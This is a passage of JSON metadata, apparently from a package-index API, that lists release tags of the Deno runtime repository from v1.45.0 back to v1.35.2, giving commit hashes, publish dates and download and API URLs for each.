6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"